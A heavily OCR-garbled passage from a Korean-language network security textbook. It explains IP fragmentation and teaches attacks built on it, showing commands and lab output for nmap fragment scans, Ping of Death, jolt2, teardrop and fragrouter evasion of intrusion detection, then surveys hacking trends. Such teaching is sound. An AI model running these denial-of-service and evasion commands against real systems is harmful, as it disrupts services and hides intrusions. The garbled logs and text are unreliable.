20:55:56.558095 Linux80. kisa. or.kr > insecure, kisa. or.kr： (frag 30338:148091480+) 

20:55:56.565466 Linux80.kisa.or.kr > insecure.kisa.or.kr： icmp： echo request 
(frag 30338:148090+) 


이써네 트망을 통하여 전송되 기 전의 데 이 터 그램 은 20byte 의 IP 머 리부와 8byte 의 ICMP 
머 리 부，그리 고 4000byte 이 ICMP 자료를 가진 총 4028byte 의 데 이 터 그램 이 다. 하지 만 이 
써 네 트를 통하여 전송되 기 위 해서 는 이써 네 트의 MTU 즉 1500byte 를 넘 을수 없으므로 
1500byte 또는 그보다 작은 쪼각으로 조개서 전송되 게 된다. 다음 그림 은 이써네 트를 통 
하여 전송되는 3개의 조각을 도식화한것 이 다. 


20 8 1472 20 1480 20 1048 


IP 머리부 


ICMP 자료 

IP 머리부 

ICMP 자료 

IP 머리부 

ICMP 자료 

1 

ICMP 머리 부 
(ICMP echo request) 



빼 

1500 bytes 

빼 

1500 bytes 

베 ^ 

1 06B bytes 


그림 2-2. ip 쪼각화의 실례 


tc&dump 에 의 해 수집 된 결 과와 우의 그림 에 서 도식 화한 매 조각의 내 용을 보면 쪼 
리해 에 도움이 될 것 이 다. 


100 
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우선 첫번째 쪼각은 20 byte 의 IP 머리부와 8 byte 의 ICMP 머리부， 그리고 

1472(=1500-20-8) byte 의 ICMP 자료로 구성 되 여 있 다. IP 머 리 부에 는 다음의 정 보들이 있 다. 


Protocol = ICMP 
Fragment ID = 30338 
More Fragments Flag = 1 
Fragment Offset = 0 
Data Length = 1480 

아래 의 tcpdump 에 의 해 수집 된 첫 번째 쪼각의 내 용에 서 30338은 쪼각 ID ， 1480은 자 
료길 이，0은 조각 변위 값，+는 MF 기 발이 1로 설정 되 여있음을 보여준다. 


tinuxBO.pica insecure, : ksmp: eaho request (frafl 30338:1 斗 30®0+) 


쪼각 ID 


추가쪼각지시 
쪼각 변위값 


IP 규약이 될수 있다. 여기서는 ICMP 파케트를 보내고있으며 tcpdump 에서 ICMP 머 
리 부정보를 통하여 이 파케 트가 ICMP echo request 라는것 을 출력 하고있 다. 

두번째 조각은 20 byte 의 IP 머 리 부와 1480 byte 의 ICMP 자료로 구성 되 여 있 다. 모든 조 
각에 는 20 byte 의 IP 머 리 부가 포함되 는데 두번째 조각의 IP 머 리 부는 다음의 정 보들을 가 
지고있다. 


Protocol = ICMP 
Fragment ID = 30338 
More Fragments Flag = 1 
Fragment Offset = 1480 
Data Length = 1480 


쪼각변위값은 1480 이며 첫번째 조각과는 달리 ICMP 머리부를 가지고있지 않기때문 
에 ICMP 류형정 보를 알수 없다. ICMP echo request 파케 트가 두번째 쪼각부터 는 보이지 않 
는것을 알수 있다. TCP 나 UDP 파케트인 경우 목적지 포구번호정보를 가지지 않는다. 이 
처 럼 오직 첫 번째 조각에만 TCP , UDP , 또는 ICMP 머 리부가 포함되 여있기 때 문에 파케 
트러 과장치 에 서 첫 번째 조각만 차단되 는 경 우가 많다. 따라서 조각 ID 를 리용하여 대 화 
련결 상태를 유지하여야 한다. 

마지 막 쪼각도 20 byte 의 IP 머 리 부와 나머 지 ICMP 자료 즉 1048 byte 의 ICMP ; 


녀분로 구 

원 
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성 되 여있 다. IP 머 리 부는 다음의 정 보를 가지 고있 다. 

Protocol = ICMP 

Fragment ID = 30338 

More Fragments Flag = 0 

Fragment 0 伴 set = 2960 

Data Length = 1048 

여기서 더 이상 쪼각이 없기때문에 MF 기발이 0으로 설정된것을 볼수 있다. 두번째 조 
각과 마찬가지로 ICMP 머리부가 포함되지 않았다. 이상에서 4000 byte 의 ICMP 자료가 망 
을 통하여 전송될 경 우 MTU 에 따라 조각화되 는 과정 을 간단히 살펴보았다. 

쪼각을 리용한 공격기술들 

우에 서 언급한것 처 럼 조각화는 큰 파케 트를 전송하기 위하여 발생 되 는 정 상적 인 과정 
이지만 공격 자는 조각을 조작하여 방화벽 이나 침 입검출체계를 우회하거 나 봉사거부공격 을 
조장시킬수 있다. 

^ Tiny fragment 공격 

Tiny fragment 공격 은 첫 번째 쪼각을 아주 작게 만들어 서 망침 입 검 출체 계 나 방화벽 을 
우회 하는 공격 이 다. TCP 머 리 부 (일 반적 으로 20 byte ) 가 2개 의 조각에 나누어 질 정 도로 작 
게 조개서 목적지 TCP 포구번호가 첫번째 쪼각에 있지 않고 두번째 조각에 놓이도록 한 
다. 방화벽이나 침입검출체계는 파케트려과를 하기 위하여 포구번호를 확인하는데 포구번 
호가 포함되지 않을 정도로 아주 작게 ( tiny ) 조각화된 첫번째 조각을 통과시 킨다. 또한 실 
제 포구번호가 포함되 여있는 두번째 쪼각은 검사도 하지 않고 통과시 킨다. 그 결과 보호 
되여야 할 목적지 봉사기에서는 이 파케트들이 재조립되여 공격자가 원하는 포구의 프로 
그람으로 무사히 련결될수 있다. 이 런 방법으로 방화벽 에서 차단되여 야 하는 파케트를 통 
과시킬수도 있고 침입검출체계에서 비정상적인 접속으로 검출되여야 하지만 전혀 검출되 
지 않게 할수도 있다. 일부 방화벽들은 TCP 머리부의 포구번호가 포함되지 않을 정도로 작 
은 첫번째 조각은 차단시 킨다. 

Tiny fragment 공격 은 잘 알려 진 훑기 도구인 nmap 에 서 도 공격 이 가능하다. 
nmap 에서 _f 옵션을 사용하여 TCP 머 리부를 몇 개의 쪼각으로 분할하여 훑기 한다. 
[ root 9 Linux 80 / root ]# nmap _f _sS -p 23 172.16. 2. 34 

Starting nmap V . 2. 54 BETA 1 by fyodor 9 insecure.org ( www . insecure , org / nmap / ) 
Interesting ports on insecure . ca . ko.kp (172.16.2.34): 

Port State Service 
23 /tcp open telnet 

completed — 1 IP address (1 host up ) scanned in 0 seconds 
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이 때 tcpdump 를 리 용하여 파케 트를 수집 한 결 과이 다. 

02:57:25.633885 truncated-tcp 16 (frag 19350:1690+) 

02:57:25.634375 Linux 80. pica . ko.kp > insecure . ca . ko . kp : (frag 19350:4916) 
02:57:25.635071 insecure , ca . ko . kp . telnet > Linux 80. pica , ko . kp . 34326: S 
1348389859:1348389859(0) ack 3078700240 win 32696 <mss 536〉 ( DF ) 
02:57:25.639159 Linux 80. pica . ko . kp . 34326 > insecure , ca . ko . kp . telnet I R 
3078700240:3078700240(0) win 0 

tcpdump 의 결과로 TCP SYN 훑기 즉 half-open 훑기가 진행된것을 알수 있다. 그런 
데 첫번째 쪼각크기는 16 byte 로 아무런 옵션이 없을 경우의 TCP 머리부크기인 20 byte 보 
다 작은것을 볼수 있다. 그리고 나머지 TCP 머 리부 4 byte 는 두번째 쪼각에 있다. 일부 침 
입검출체계에서는 이러한 조각화된 스텔스공격을 검출못하는 경우도 있다. 

^ Fragment Overlap 공격 

Tiny fragment 공격 수법 에 비 해 좀더 정 교한 공격 이 fragment Overlap 공격 이 다. 

공격 자는 공격 용 IP 파케 트를 위하여 두개 의 조각을 생 성한다. 첫번째 조각에는 방화 
벽에서 허용하는 http (TCP 80) 포구와 같은 포구번호가 있다. 그리고 두번째 쪼각에서는 
변위값을 아주 작게 조작하여 조각들이 재조립될 때 두번째 쪼각이 첫번째 조각의 일부분 
을 덮어쓰도륵 한다. 일반적으로 공격 자들은 첫번째 조각의 포구번호가 있는 부분까지 덮 
어 씌 운다. 

IDS 에서는 첫번째 조각은 허용된 포구번호를 가지고있기때문에 통과시키고 두번째 조 
각은 이전에 이미 허용된 조각의 ID 를 가전 조각이므로 역시 통과시킨다. 

이 두개의 조각이 목적지 봉사기에 도달하여 재조립되면 첫번째 쪼각의 포구번호는 두 
번째 조각의 포구번호로 겹 쳐씌여지게 되 고 이 파케트는 려과되 여 야 할 포구의 응용프로 
그람에 전달한다. 

^ IP 조각을 리용한 봉사거부공격 

조각은 방화벽 이 나 침 입 검 출체 계 를 우회 하는데 리 용될 뿐만아니 라 봉사거 부공격 에 도 리 
용될 수 있 다. 이 미 잘 알려 진 Ping of Death 공격 이 나 Teardrop 과 같은 조각을 리 용한 봉 
사거부공격이라고 할수 있다. 이러한 공격들은 이미 잘 알려져있으며 많은 체계에서 이미 
수정되였지만 최근 Windows 체계들도 아직 취 약점을 여전히 가지고있다. 

Ping of Death , Jolt 

이 공격수법은 표준으로 규정된 길 이 이 상으로 큰 IP 파케 트를 전송하여 이 파케 트를 수 
신받은 조작체 계 에서 비정 상적 인 파케트를 처 리하지 못하게 함으로써 봉사거부공격 이 발 
생 하도록 하는 방법 이 다. 

RFC -791 "Internet Protocol ” 에 의 하면 머 리 부를 포함한 IP 파케 트의 
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65535( 즉 2 16 -1)까지로 제한되여있다. 따라서 실제로 많은 체계들에서 IP 파케트를 처리 
하는 코드들이 이 와 같은 최대길 이를 가정 하여 실현되 여있다. 

보통 공격 은 가장 손쉽 게 IP 파케 트로 전송할수 있는 ping 프로그람을 리용하여 수행 
되는데 ping 프로그람은 실제 ICMP echo request 파케트를 상대방에게 전송한다. 보통 IP 
파케트의 머리부는 특별한 옵션을 사용하지 않았을 경우에 20 byte 가 사용되며 ICMP echo 
request 파케 트는 8 byte 의 ICMP 머 리 부를 사용하기 때 문에 실 지 자료길 이 의 최 대 값은 
65535-20_8=65507 byte 가 된다. 따라서 ping 파케트의 최대길이를 제한하지 않는 체계에 
서 는 다음과 같은 간단한 명 령 으로 공격 을 수행할수 있 다. 


ping -1 65510 victim , host . ip . address 

기 존의 WindowsNT 체 계 에 서 는 이 러 한 명 령 이 허 용되 였지 만 최 근에 는 비 정 상적 으로 큰 
ICMP 자료를 발생 시키지 못하도록 하고있다. 하지 만 jolt 라는 공격 도구를 리용하여 가능 
한 IP 데 이 터그램 의 크기 를 초과하는 파케 트를 생 성하여 전송하는 공격 을 사용할수 있 다. 


[rootSinsecure DoS ] # . / jolt 2 

Usage : . / jolt 2 [_s src _ addr ] [_p port ] dest_addr 
Note ： UDP used if a port is specified , otherwise ICMP 
[rootSinsecure DoS ] # . / jolt 2 -p 139 172.16.2.3 

공격 시 tcpdump 를 리 용하여 파케 트를 수집 하여 보면 다음과 같다. 


20:04:51.188599 insecure . ca . ko.kp > 172.16.2.3: (frag 1109:9965520) 


20 

20 

20 

20 

20 

20 


04:51.188850 insecure . ca . ko.kp > 
04:51.189103 insecure . ca . ko.kp > 
04:51.189358 insecure . ca . ko.kp > 
04:51.189608 insecure . ca . ko.kp > 
04:51.189864 insecure . ca . ko.kp > 
04:51.190115 insecure . ca . ko.kp > 


172.16.2.3 

172.16.2.3 

172.16.2.3 

172.16.2.3 

172.16.2.3 

172.16.2.3 


20:04:51.190367 insecure . ca . ko.kp > 172.16.2.3 
20:04:51.190620 insecure . ca . ko.kp > 172.16.2.3 


(frag 1109:9965520) 
(frag 1109:9965520) 
(frag 1109:9965520) 
(frag 1109:9965520) 
(frag 1109:9965520) 
(frag 1109:9965520) 
(frag 1109:9965520) 
(frag 1109:9965520) 


공격 대 상체 계 인 172.16.2.1 호스트는 WindowsNT 4.0 체 계 인데 이 공격 으로 인하여 체 
계가 정지되는것을 확인할수 있다. 


Teardrop , bonk , New Teardrop 

Teardrop 공격 도 역 시 조각의 재 조립 과정 의 취 약점 을 리 용한 봉사거 부공격 으로 두번 
째 조각의 변위값을 조작하여 쪼각들을 재 조립하는 과정 에 완충기 를 넘 쳐 겹쳐 쓰게 한다. 
) 프로그람은 겹 쳐씌 여 진 변위 값마당을 가진 조각을 만들어 목표체 계 에 전송하며 조 
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각들을 재조립 하는 목표체 계 가 정지되거 나 재시동하게 한다. 

Teardrop 공격 도구를 리용하여 보자. 

[rootSunsecure DoS ] # . / teardrop . Linux —help 

. / teardrop . Linux src_ip dst_ip [ _s src_prt ] [ _t dst_prt ] [ _n how_many ] 
[ root 9 unsecure DoS ] # . / teardrop . Linux 1.1.1.1 172.16.2.3 ~t 139 
[ Binary courtesy : http :// www . rootshell . com / ] 
teardrop route | daemon 9 
Death on flaxen wings : 

From : 1.1.1.1.46838 
To ： 172.16.2.3. 139 
Amt : 1 
[ bOOm ] 

이 때 tcpdump 를 리 용하여 파케 트를 수집 한 내 용이 다. 

23:29:18.503558 1.1.1.1.51331 > 172.16.2.3.139: udp 28 (frag 242:3690+) 
23:29:18.504693 1.1.1.1 > 172.16.2.3： (frag 242:4924) 

byte ᄆ Byte 24 Byte 27 Byte 35 



첫번째 조각의 크기 가 36인데 두번째 쪼각의 변위값이 24이므로 체 계는 36에서 24 
로 수정되여야 한다. 이 경우 TCP/IP 규약 실현코드의 일부에서 fp-〉len 이 부수로 되며 이 
값이 memcpyO 함수에 의 해 대 단히 큰 정수로 해석되기때문에 일부 조작체 계는 다른 프 
로그람의 기억기령역까지 덮어 씌여지게 된다. 

Teardrop 공격과 류사한 공격 으로 Bonk , New Teardrop 와 같은 공격 이 있 다. 

fragrouter 

fragrouter 는 단순히 한방향으로 조각화하는 경 로기 라고 할수 있는데 공격자로부터 IP 
파케트들이 fragrouter 에 전달되 면 fragrouter 에서는 이 파케트를 조각화된 자료흐름으로 바 
꾸어서 목표체 계 에 넘겨준다. fragrouter 는 하나의 망대면부로 파케 트를 받아서 
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양한 형태로 쪼각화한후 동일한 대면부 혹은 2개이상의 망대면부로 각각 넘겨주는 역할 
을 하고있다. 


공격자 

공력 파케트 


공격파케트쪼각들 

,_ K ,_|\ ,_|\ ,_ K 


1 〉 

Fragrouter 

1 그) l —) 






NIDS 


fragrouter 를 리 용하여 공격 시 험 을 하기 위 해서 다음의 3대 의 콤퓨터 를 사용한다. 

Attacker : 172.16. 2. 1 

Fragrouter : 172.16. 2. 2 

Victim : 172.16. 4. 80 ( Linux 80. pica . ko . kp ) 

단계 1 : 

먼 저 공격 체 계 에 서 목표체 계 로 가는 모든 파케 트가 fragrouter 가 설 치 된 체 계 를 통과 
하도록 경 로조종표를 조정한다. 

[ Attacker ] # route add -host 172.16. 4. 80 gw 172.16.2.2 
[ Attacker ] # netstat -nr 
Kernel IP routing table 

Destination Gateway Genmask Flags MSS Window irtt Iface 
172.16.4.80 172.16.2.2 255.255.255.255 UGH 0 0 0 ethO 


단계 2 : 

fragrouter 가 설 치된 호스트에서 모든 파케 트를 8 byte 로 조각화하여 넘 겨 주도록 설정 
한다. 


[ fragrouter -1.6] # . / fragrouter _i ethO ~ F 1 
fragrouter : frag -1 : ordered 8 ~byte IP fragments 


{I 
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공격체계에서 목표체계로 ping 을 전송하여 본다. 
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[ Attacker ] # ping 172.16.4.80 

이때 ping 파케 트는 바로 목표체 계 로 전송되지 않고 fragrouter 로 전송되 여 8 byte 로 쪼 
각화되여서 전송된다. 


[ fragrouter - 1 .6] # . / fragrouter _ F 1 


fragrouter : frag -1 : ordered 8 ~byte IP fragments 


172.16.2.1 

172.16.2.1 

172.16.2.1 

172.16.2.1 

172.16.2.1 

172.16.2.1 

172.16.2.1 

172.16.2.1 


> 172.16.4.80 

> 172.16.4.80 

> 172.16.4.80 

> 172.16.4.80 

> 172.16.4.80 

> 172.16.4.80 

> 172.16.4.80 

> 172.16.4.80 


icmp : type 8 code 0 (frag 34908:890+) 
(frag 34908:898+) 

(frag 34908:8916+) 

(frag 34908:8924+) 

(frag 34908:8932+) 

(frag 34908:8940+) 

(frag 34908:8948+) 

(frag 34908:8956) 


단계 4 : 

망감시결과 목표체계로 전송되는 ping 파케트는 모두 8 byte 로 조각화되여 전송된다는 
것을 알수 있다. 일반적 인 ping 자료파케트는 56 byte 로 쪼각화되지 않고 전송된다. 


[ root 9 Linux 80 kcr ] # tcpdump host 172.16.2.1 
tcpdump : listening on ethO 


14 

14 

14 


10:37.538311 172.16.2.1 > Iinux 80. picxa . ko . kp ： icmp : echo request (frag 34908:890+) 


10:37.538599 172.16.2.1 > Linux 80. pica . ko.kp 
10:37.538642 172.16.2.1 > Linux 80. pica . ko.kp 


(frag 34908:898+) 
(frag 34908:8916+) 


14 

14 

14 

14 

14 

14 


10:37.538724 

10:37.538790 

10:37.538859 

10:37.538943 

10:37.539023 

10:37.539575 


172.16.2.1 > Linux 80. pica . ko.kp 
172.16.2.1 > Linux 80. pica . ko.kp 
172.16. 2.1 > Linux 80. pica . ko . kp 
172.16.2.1 > Linux 80. pica . ko.kp 
172.16. 2.1 > Linux 80. pica . ko . kp 
Linux 80. pica . ko.kp > 172.16.2.1 


(frag 34908:8924+) 
(frag 34908:8932+) 
(frag 34908:8940+) 
(frag 34908:8948+) 
(frag 34908:8956) 
icmp ： echo reply 


우의 례에서는 ping 파케 트를 전송하는것 을 보았지 만 공격 파케트도 마찬가지 로 아주 
작은 쪼각으로 분할되여 전송된다. 


이처럼 fragrouter 는 그 자체로는 공격도구는 아니지만 다른 공격 시 망침 입 걸출체계 
에 검출되지 않고 공격 을 가능하게 한다. 례를 들어 웨 브봉사기 에 phf 공격 을 할 
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봉사기 에 완충기 자리넘 침 공격 을 하거 나 아니 면 다른 종류의 공격 을 할 때 fragrouter 를 같 
이 사용하면 망침입검 출체 계 로부터 검 출되 는것 을 피할수 있다 . 
fragroutei ■에서 쏘각화할수 있는 형래는 아래와 같이 다양하다 . 


Usage: fragrouter [_i interface] [~p] [_g hop] [_G hopcount] ATTACK 
where ATTACK is one of the following: 

- B1 : base-1 : normal IP forwarding 

- FI: frag-1 : ordered 8~byte IP fragments 

- F2: frag-2 : ordered 24-byte IP fragments 

- F3: £rag_3: ordered 8~byte IP fragments, one out of order 


F4: frag-4: ordered 8-byte IP fragments, one duplicate 

F5: frag-5 : out of order 8~byte fragments, one duplicate 

F6: frag-6 : ordered 8~byte fragments, marked last frag first 

F7: frag-7 : ordered 16-byte fragments, fwd-overwriting 

Tl: tcp—1: 3-whs, bad TCP checksum FIN/RST, ordered l~byte segments 

T3: tcp-3: 3-whs, ordered l~byte segments, one duplicate 

T4: tcp-4: 3-whs, ordered l~byte segments, one overwriting 

T5: tcp-51 3-whs, ordered 2~byte segments, fwd-overwriting 

T7 : tcp-7 : 3-whs, ordered l~byte segments, interleaved null segments 

T8: tcp-8 : 3-whs, ordered l~byte segments, one out of order 

T9: tcp-9: 3-whs, out of order l~byte segments 

C2: tcbc_2: 3-whs, ordered l~byte segments, interleaved SYNs 

C3: tcbc_3: ordered l~byte null segments, 3-whs, ordered l~byte segments 

Rl: tcbt_l: 3-whs, RST, 3~whs, ordered l~byte segments 

12 ： ins-2 : 3-whs, ordered l~byte segments, bad TCP checksums 

13: ins-3 : 3-whs, ordered l~byte segments, no ACK set 

Ml: misc—1: Windows NT 4 SP2 - http://www.dataprotect.com/ntfrag/ 

M2: misc—2: Linux IP chains - http://vvrvvrw.dataprotect.com/ipchains/ 


IP 조각화는 망환경에서 IP 파케트의 효률적 인 전송을 보장해주고있지만 앞서 살펴본 
것과 같이 몇 가지의 보안문제를 가지 고있다 . 많은 방화벽 이 나 침 입검출체계들이 IP 재조 
립 기 능을 정 확히 제 공하지 못하고있 다 . 대 표적 인 IP 조각화를 리 용한 공격 이 Ping of Death, 
Jolt, teardrop 과 같은 봉사거부공격이 다 . 이것은 목적지 체계 가 비정상적 인 조각을 적절 
하게 재조립하지 못함으로서 발생되여 체계가 중지되거나 재기동될수 있다 . 하지만 봉사 
거 부공격보다 최 근에 더 문제 로 되 고있는것 은 IP 조각화를 리용하여 침 입 검 출체 계 나 방화 
할수 있는 기술이다 . 침입검출체계는 침입사실을 결정하기에 앞서 조각화된 파 
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케 트들을 재 조립하여 야만 IP 조각화를 리 용한 우회 공격 의 검 출이 가능할것 이 다. 하지 만 망 
침입검출체계가 쪼각화된 파케트를 재조립하기 위해서는 기억기，프로쎄스 등의 많은 체 
계자원을 필요로 하고 실시간검출이 어려워질수 있는 문제가 발생될수 있다. 호스트형침 
입 검 출체 계 에서 는 이 미 재조립된 IP 데 이 터그램 을 분석하므로 조각화문제 가 발생되지 않 
으므로 중요 봉사기 에서는 호스트형침 입검출체계 운영도 고려해볼만하다. 

一 악성 대행 체 

현재 Windows 체 계기 반의 공격 도구가 늘어 나고있 다. 그것 은 보안지식 이 없는 일 반 
사용자를 대 상으로 공격하여 보안체 계 를 우회할수 있기때 문이 다. 그리 고 Windows 체 계 의 
성 능향상 또한 공격 자로 하여 금 Windows 체 계 를 흥미있는 공격 목표로 만들고있 다. 

의뢰기 로 사용되는 Windows 체 계를 공격하여 가장 효률적 으로 리용하기 위한 수단은 
대행체형태의 프로그람이다. 대행체는 공격자의 명령을 받아 공격자대신에 공격임무를 수 
행해주고 그 결과를 다양한 방법으로 전달해줄수 있다. 이것은 공격 자로 하여금 체계 에 가 
입등록하지 않고도 체계를 조작함으로써 공격자의 로출위험을 줄여준다. 이러한 점으로 하 
여 현재 LINUX 체계에서 사용되는 뒤문이나 공격도구들도 이러한 대행체형태로 나타나고 
있 다. 

악성대행체는 비루스의 확산기능，스파이기능，원격조종기능，체계침입기능 등 다양 
한 기 능을 가지 고있으며 모든 특성 을 가진 악성대 행 체 도 존재한다. 이 미 백 오리피 스와 류 
사한 종류의 공격도구는 그 수가 수백가지에 이르며 E _ mail 을 전파매체로 사용하는 인터 
네트 웜비루스는 이러한 공격도구를 널리 류포시킬수 있는 수단이 될수 있다. 또한 E-mail 
뿐만아니라 열람기 등의 오유를 리용하여 일반적인 웨브을 통하여 류포될수도 있어 더욱 위 
험한 공격방법 이 된다. 

—사회공학수법 

보안체 계 가 잘 갖추어 진 싸이트를 공격하는 경 우나 조직 화된 공격 또는 대 규모의 공 
격 에 있어서 사회공학수법 은 필수적 인 요소이 다. 사실 사회공학수법은 망공격 에서 일반사 
용자들이 많이 주목하는 부분이며 따라서 최근에 이러한 취약점을 리용한 공격이 증가하고 
있 다. 

사회공학수법 을 리용한 가장 대 표적 인 공격 은 바로 멜 리 사비루스이 다. 멜 리 사비루스 
는 방화벽 에서 통제하지 않는 E - mail 을 그 전파매체 로 사용하고있는데，여 기서 주목할것 
은 감염된 사용자의 우편주소록을 통해서 전파된다는 점이다. 이것은 E - mail 사용자들사 
이 믿 음성관계 를 리용한것 으로써 그 효과는 피 해 규모가 말해 주고있 다. 

또한 최 근에 공개 된 공격 코드는 1524，2222 등 특정 포구를 개 방하도록 하는 뒤 문을 
설치한다. 그리고 이러한 프로그람은 매우 쉽게 콤파일되고 실제공격에서도 잘 실행된다. 
이것은 각본키디 또는 워너비들이 이러한 공개된 코드를 가지고 많은 체계를 공격하게 하 
여 인터네트의 많은 체계를 손쉽게 공격하려고 하는 의도가 있을수 있다. 사실 
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는 일부러 틀리게 작성하여 공개함으로써 일반사용자 또는 각본키디들이 〈〈절대 공짜로 쉽 
게 정보를 얻는 일이 없도록 하는것》이 일반적인 해커의 습성 이다. 

사회공학수법을 리용한 공격은 대 단히 많으며 검출하기 가 매우 어 렵 다. 이와 같이 망 
공격 은 기 술적 으로만 이 루어 지 는것 이 아니 라는것 을 명 심 하여 야 한다. 


제3절. 최근 해킹수법들의 특징과 발전방향 

2.3.1. 최근 해킹수법들의 특징 

최근 발견되는 해킹도구들은 해킹수법의 새로운 형태인 대행체화，분산화，자동화，은 
닉화의 특징을 보여준다. 각각의 특징은 독립적 인 기능이라기보다《보다 효률적 인 해킹》 
이 라는 목표를 향하여 호상의존적으로 발전하고있다. 그리고 이 려한 변화는 이미 Yahoo , 
amazon 등 유명 한 전자상거 래싸이 트에 대 한 분산봉사거 부공격 ( DDoS : Distributed Denial 
of Service ) 에 서 표면 화되 였 다 . 


1) 대행체화 

전동적 인 해 킹 수법 에 서 는 해 커 가 침 입한 체계에 다시 가입등록하거 나 또는 뒤문을 동 
하여 재침입하여 다른 체계를 해킹하는 해킹전의 단계를 거치는것이 일반적이였으나 최근 
의 해 킹수법 에서는 원격 으로 조정 가능한 대 행 체형의 뒤 문을 설 치 하고 이를 리 용하여 다른 
체계를 해 킹 하는 방법 을 사용한다. 이것은 해커 가 매번 기록파일에서 자신의 흔적 을 지 워 
야만 하는 시끄로운 작업을 없애주며 많은 체계를 리용하여 분산해킹을 수행할 때 매우 효 
과적인 방법 이 다. 

2) 분산화 

전통적 인 해 킹수법 에서는 하나의 체 계 에서 단일의 해 킹대상체 계 나 대 규모의 광지역망 
을 대상으로 해킹을 시도한다면 새로운 해킹수법에서는 침입검출체계 등의 보안체계를 우 
회하기 위하여 많은 수의 체계에서 단일한 체계 또는 다수의 체계를 해킹하는 방법을 사 
용한다. 

분산해 킹은 원격 명령으로 해킹을 수행 하거 나 또는 파케 트를 중계 하는 대 행 체 화된 해 
킹도구를 리용함으로써 해커의 위치를 감출수 있으며 보다 빠르게 해킹대상체계에 대한 정 
보를 수집할수 있 다. 


3) 자동화 

인 터네 트 웜 및 Windows 용해킹 도구 그리 고 최 근 침 해 사고에 서 발견되 는 자동해 킹 각 
본의 증가는 해 킹도구들이 자동화되고있음을 의미한다. 그리 고 이 러한 자동화는 분산망해 
리ᅴ흔 쇠•하게 한다. 
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4) 은닉화 

대 행 체 를 리 용한 분산해 킹 수법 은 침 입 검 줄체 계 를 무력 화시 키 는 가장 효과적 인 해 킹 수 
법 으로서 해 커 의 위 치 를 숨길수 있는 해 킹 수법 이 다. 이 러 한 대 행 체 와 해 커 사이 의 통신은 암 
호화 및 통로뚫기 ( tunneling ) 수법을 리 용하여 검 출하기 어 렵게 한다. 

2.3.2. 새로운 망해킹의 발전방향 

앞에 서 설 명한바와 같이 새 로운 해 킹수법 은 대 행 체화，분산화，자동화，은닉화를 추 
구하고있으며 해 킹용도에 따라 특정기 능만을 리용하거 나 또는 이 리 한 모든 기 능을 가진 악 
성 대 행 체 또는 해 킹 도구가 나타날것 이 다. 또한 WAP , PDA 등의 인 터네 트응용프로그람 
이 많아질수록 그에 비례하여 해킹방법도 다양해질것이며 이러한 해킹을 검출하고 대응하 
기 위해서는 더욱 많은 노력과 비용이 요구될것이다. 

망해킹에서 봉사기를 대상으로 하는 해킹보다 상대적으로 보안지식이 없는 일반사용 
자를 대상으로 하는 해킹이 증가하고있으며 앞으로도 지속적으로 발전，증가할것이다. 그 
것 은 아직 개 별적 인 사용자에 대 한 보안지식 및 보안대 책 이 미 미 하기때 문이 다. 

망해킹 또한 실세계에서의 해킹과 마찬가지로 가장 취약한 부분을 찾아 해킹하기 마 
련이 다. 

인 터네 트의 발전속도와 비 례하여 망해 킹 수법 도 발전한다. 인 터네 트와 관련된 수많은 응 
용프로그람의 발전과 함께 그에 따르는 취 약점 및 해 킹수법 이 다양화되고있다. 새로운 인 
터네트매체는 악성대행체의 류포에 사용될수 있으며 매일 새롭게 개발되는 인터네트응용 
프로그람들은 잠재적 인 취 약성 또는 오유를 포함한다. 그리고 조작체계 또는 망통신규약 
과 관련된 오유보다는 응용프로그람 계층에서의 취약점들이 많이 발견되고 해킹에 사용될 
것이다. 

인터네 트해 킹 이 경제 적목적 뿐만아니 라 정 치 적목적 으로 하여 사용될 가능성 이 높아지 
고있다. 경제적목적뿐만아니라 정치적으로 리용하기 위해서 DDoS 와 같은 해킹을 수행할 
수도 있다. 이것은 이전의 홈폐지변조，자료류출 등의 피해 차원의 해 킹 이 기보다는 여론 및 
인터네트통신을 움직이기 위한 보다 조직적이고 교묘한 해킹이 될수도 있다는것이다. 


執 
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제4절. 해킹의 몇가지 실례들 

2.4.1. 내부로부터의 공격 

공격 의 대 부분은 내 부에 근원을 두고있 다. 자료에 의하면 공격 의 70%가 기 관내 의 사 
람 또는 내부의 정 보를 아는 사람에 의하여 진행 되 였 다. 외 부의 공격 으로부터 자원을 보 
호하는데는 보통 방화벽을 리용하면 되지만 이 공격은 기관의 내부망이 어떻게 동작하는 
가 하는것을 잘 알고있는것으로 하여 자료를 쉽게 손상시킬수 있는 내부사용자에 관한 문 
제 이 다. 

대부분의 관리자들은 자기 망을 외부적공격으로부터 보호하는데는 큰 관심을 돌리고 
있지만 내부의 공격이 보다 큰 위협으로 된다는데 대해서는 크게 느끼지 못하고있다. 

실례로 한 기관책임자가 기관내 NetWare 봉사기에 대한 완전한 감독권한을 가질것을 
고집하였다. 그는 특별히 콤퓨터지식이 있는것도 아니고 이러한 접근준위를 요구하지도 않 
았으나 자기 가 기 관책 임 자라고 하여 그것 을 고집하였 다. 

무슨 일이 일어났는가를 독자들이 추측하리라고 믿는다. 자기의 체계에서 간단한 몇 
가지 조작을 하다가 그는 부주의 로 자기의 M : 구동기의 CCDATA 등록부를 지워버 렸다. 만 
일 Cc : Mail 을 관리해보았다면 이 등록부가 우편국을 위한 보관장소이 며 모든 우편통보 
문들과 공개등록부들을 포함한다는것 을 알것 이 다. 

CC : Mail 에서 기 본우편파일들은 거의 항상 열 려있으며 보통방법 으로는 복제 하기 
어 렵 다. 이 회사는 종업 원들이 거의 쓰지 않는 개 인용등록부들을 제외한 모든 우편통 
보문들을 잃었 다. 약 2년간의 자료가 모두 없어지 고 말았다. 이것은 고의적인 공격은 아 
니 였지 만 경 영 활동에 막대한 손실 을 주었 다. 

계속 증가되는 위협은 자료의 파괴가 아니라 자료의 도난과 손상이다. 이것을 보 
통 산업 (또는 기 업 )정 탐이 라고 하는데 내 부적 자료파괴 와 같은것 으로 보지 는 않지 만 독 
점적이며 비밀적인 정보를 가지고있는 기관들 특히 그 자료가 손상되면 법적책임을 져 
야 하는 기관들에서는 실제적인 위협으로 된다. 

2.4.2. 외부적공격 

외부적공격은 많은 원천들을 가지고있다. 이러한 공격은 불만을 품은 종업원들로부터 
올수도 있지만 가능한 공격자들의 범위는 많아전다. 공통적인것은 공격에 의하여 무엇인 
가 얻으러 한다는것 이다. 

1) 경쟁자 

만일 어떤 회 사가 경쟁 이 매우 심 한 기 업 을 하고있다면 야심 적 인 경쟁 자가 그 망을 공 
득을 볼수 있다. 이것은 설계나 금융자료를 훔치는 형태이거나 또는 망자원을 쓸 
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수 없게 만드는것일수도 있다. 

경쟁자의 설계를 훔치는것의 리득은 명백하다. 이 정보를 가지면 훔친자는 그 회사의 
설계를 리용하여 개발시간을 단축하거나 자기 제품의 성능을 더 좋게 할수 있다. 만일 경 
